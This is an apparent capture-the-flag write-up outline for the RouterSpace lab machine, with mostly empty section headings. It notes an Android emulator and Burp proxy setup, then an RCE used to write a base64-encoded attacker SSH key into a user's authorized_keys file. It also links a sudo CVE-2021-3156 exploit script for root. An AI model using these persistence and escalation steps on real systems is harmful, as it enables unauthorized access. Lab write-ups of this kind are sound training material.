RouterSpace

Enumeration

Ports and Services

Software Installed:

Nmap Scan Results:

Homepage

Downloaded RouterSpace.apk
Setup Anbox for emulating android
https://chennylmf.medium.com/how-to-install-anbox-on-kali- linux-2022-1-40d40cb77d9d
Installed app and setup proxy:
prxy setup: adb shell settings put global http_proxy 10.10.14.25:8080
Dont forget to have burp listen on the interface

Hostname:

Initial Foothold

RCE in webrequest from Agent

Original Capture

Reflection:

System Command:

System Command 2:

Created authorized keys

echo -n 'c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDU3h3V0RVWC9RNjZSNjlMMUVvcyswNkpFbjJqUU1jQ0RzSmovdjlxWHRoTUpWYnRua09Pd05NZHJEWVIxTVJ5akg1VDhmd1ZLWTVRYmdRMGcvOEtSSEJkV3JEQkZoOUFtM0FEVmNYZFZiZ0xvMnUrMWtlMk04RE45MkRGOE1WMlpBbnpvUUR5S01EK2pSZjFESGF1ait3RVJmYytiRFVXbjZUT2dMYjBTbllmM01HZTZzZm9LMDVPc3FxVUxpbjR3RnZ5dnNYQ0RNSWFFOVBEKytoMXAvUEE1NEVSTkdtOWFiallEdnBFb0p1Y2Y5Y2poY2sxeU5JR0N4dTU2UThJKzZWWGRWbEtmVHByY2Nvc0I4RWhMS3ozY1VSZHAxdi9lRjl1enBJaGdoUDNoaUVGUUZ1REhMdTA3UXNhdE9aUUdFV2hZNXF4cy9vblllbEZLQ3hrZXFXQUhqMXAxbFEyemVQdzdUb1Z0UXQ3RnBjdGswRE9hWDBxS2NNZ1N2SHZMWGx6VGNvOXM4S3plb3htd3NaRWRDOFYxaXJYY0c3YXJmTmNlRHhPTjRHZnRLaFZvdzlXNS9SNHh1Um5yMnpVSUI0T08rMUQ0cDhPWFRkd2dzQkc1ZHprellZSFNIYjFMamxTVHNZL3NxWm9qK3kwSVhqbDBHOEIyNU9tTk5DZVU9IHJvZ3VlQGthbGk=' | base64 -d > /home/paul/.ssh/authorized_keys

User.txt Proof Screenshot

Privilege Escalation

CVE-2021-3156
https://raw.githubusercontent.com/worawit/CVE-2021-3156/main/exploit_nss.py

RootScreenshot Here: